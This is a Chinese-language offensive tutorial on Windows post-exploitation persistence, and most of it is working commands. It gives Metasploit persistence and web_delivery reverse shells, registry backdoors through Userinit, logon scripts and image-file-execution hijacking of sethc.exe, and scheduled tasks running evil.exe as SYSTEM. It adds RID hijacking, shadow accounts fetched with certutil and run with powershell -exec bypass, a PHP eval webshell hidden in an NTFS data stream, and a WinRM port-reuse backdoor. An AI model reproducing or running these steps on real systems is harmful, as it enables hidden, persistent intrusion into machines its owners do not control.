msf persistence模块

向目标主机的注册表添加键值，使后门程序开机自启

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.80.145

image.png

userinit注册表后门

Userinit注册表键的作用是用户在进行登陆时，WinLogon进程运行指定的程序，可以更改它的值来添加与删除程序。具体键值：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

userinit优先于很多杀软启动，通过调用powershell(例如web_delivery模块)，可以做到无文件落地，实现一定程度的免杀效果。

exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.80.167
run

image.png

Logon Scripts

优先于杀软启动，和userinit类似，但是需要在目标磁盘上留下文件，隐蔽性不佳。注册表位置：

HKEY_CURRENT_USER\Environment\

创建字符串键值: UserInitMprLogonScript
键值设置为后门的绝对路径 C:\1.bat

image.png

计划任务

1. at命令

net time \\192.168.80.80
at \\192.168.80.80 11:34 c:/evil.exe
at \\192.168.80.80
at \\192.168.80.80 1 /del

2. schtasks命令

• /RL 指定运行级别(LIMITED和HIGHEST,默认LIMITED)
• /F 强制创建
• /RU 指定用户权限
• /TN 指定任务名称
• /TR 指定路径和文件名

schtasks /create /RL HIGHEST /F /RU SYSTEM /TN TestService1 /SC DAILY /ST 14:17 /TR c:/evil.exe 以system用户创建计划任务
schtasks /create /F /TN TestService1 /SC DAILY /ST 14:17 /TR c:/evil.exe 以普通用户创建计划任务
schtasks /query | findstr "Test" 查询计划任务
schtasks /run /TN TestService1 手动运行
schtasks /F /delete /TN "TestService1" 删除计划任务

映像劫持

1. 实现效果：运行A程序，实际运行的却是B程序

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /d "C:\Users\Administrator\Desktop\a.exe" /f

image.png

此时，登录按5次shift键即可上线cs。

2. 实现效果：关闭A程序，B程序却被打开了

• 使用微软官方工具

http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools/dbg_x86.msi

image.png

• 使用管理员用户添加注册表

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Users\Administrator\Desktop\evil.exe"

此时关闭记事本，会上线cs。

RID劫持

• 原理
  在注册表中(HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account)，把普通用户的键值修改为管理员用户的键值，以实现登录普通用户，可以使用管理员用户的权限。有些条件下我们不方便修改Administrator的密码，又得不到密码的情况下，可以使用这种方式登陆administrator的桌面环境。

• 利用场景
  启用guest用户，修改RID；登录guest用户，获得高权限

• msf中有对应的模块

use post/windows/manage/rid_hijack
set guest_account true
set session 1
exploit

image.png

• 此时使用psexec登录guest用户即为system权限

image.png

影子账户

• 原理
  通过修改注册表，克隆已有账户的权限。
  实现的效果是：net user看不到用户、计算机管理看不到用户、注册表里能看到用户，但是重启后计算机管理里还是会出现。

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1
powershell -exec bypass -File Windows-User-Clone.ps1

image.png

利用NTFS ADS流隐藏webshell

1. 创建ads数据流文件

echo ^<?php @eval($_POST['cmd']);?^> > phpinfo.php:hidden.jpg

此时使用dir看不到该文件，使用dir /r才可以看到

image.png

或者使用notepad打开能看到文件内容

notepad phpinfo.php:hidden.jpg

image.png

2. 利用文件包含制作webshell
   使用一个正常的php文件把ADS数据流文件include进去，即可解析一句话代码

<?php include('phpinfo.php:hidden.jpg')?>

image.png image.png

3. 如何删除ads数据流文件？
   直接删除宿主文件即可

组策略设置脚本启动

通过gpedit.msc组策略设置"脚本(启动/关机)"、"脚本(登录/注销)"

image.png

端口复用

在安装了IIS的Windows服务器上，通过WinRM服务，组合HTTP.sys驱动自带的端口复用功能，一起实现正向的端口复用后门。

1. 配置端口复用后门

• 对于Windows 2008系统，需要先使用命令启动WinRM服务，然后将winrm服务的端口修改为80

winrm e winrm/config/listener  查看WinRM服务的状态，未启动则返回空
winrm quickconfig -q  启动WinRM服务
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

• 对于Windows 2012系统，WinRM服务默认启动并监听了5985端口，直接使用以下命令新增一个80端口的listener即可实现端口复用

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

2. 连接后门

• 首先启动WinRM服务，并设置信任连接的主机

winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="192.168.80.80"}

• 然后使用winrs命令连接远程WinRM服务执行命令

winrs -r:http://192.168.80.80 -u:administrator -p:1qaz!QAZ whoami
winrs -r:http://192.168.80.80 -u:administrator -p:1qaz!QAZ cmd 获得交互式shell

image.png

3.需要注意的点

• WinRM服务受UAC限制，所以只有administrator可以登录，要想允许本地管理员组的其他用户登录WinRM，需要修改注册表设置。

• 使用系统自带的winrs命令登录需要明文账号密码，很多场景下尤其是windows 2012以后，通常只能抓取到本地用户密码的hash值，这时需要使用支持NTLM hash登录的客户端进行连接。

参考：

https://www.secpulse.com/archives/103301.html
https://paper.seebug.org/1004/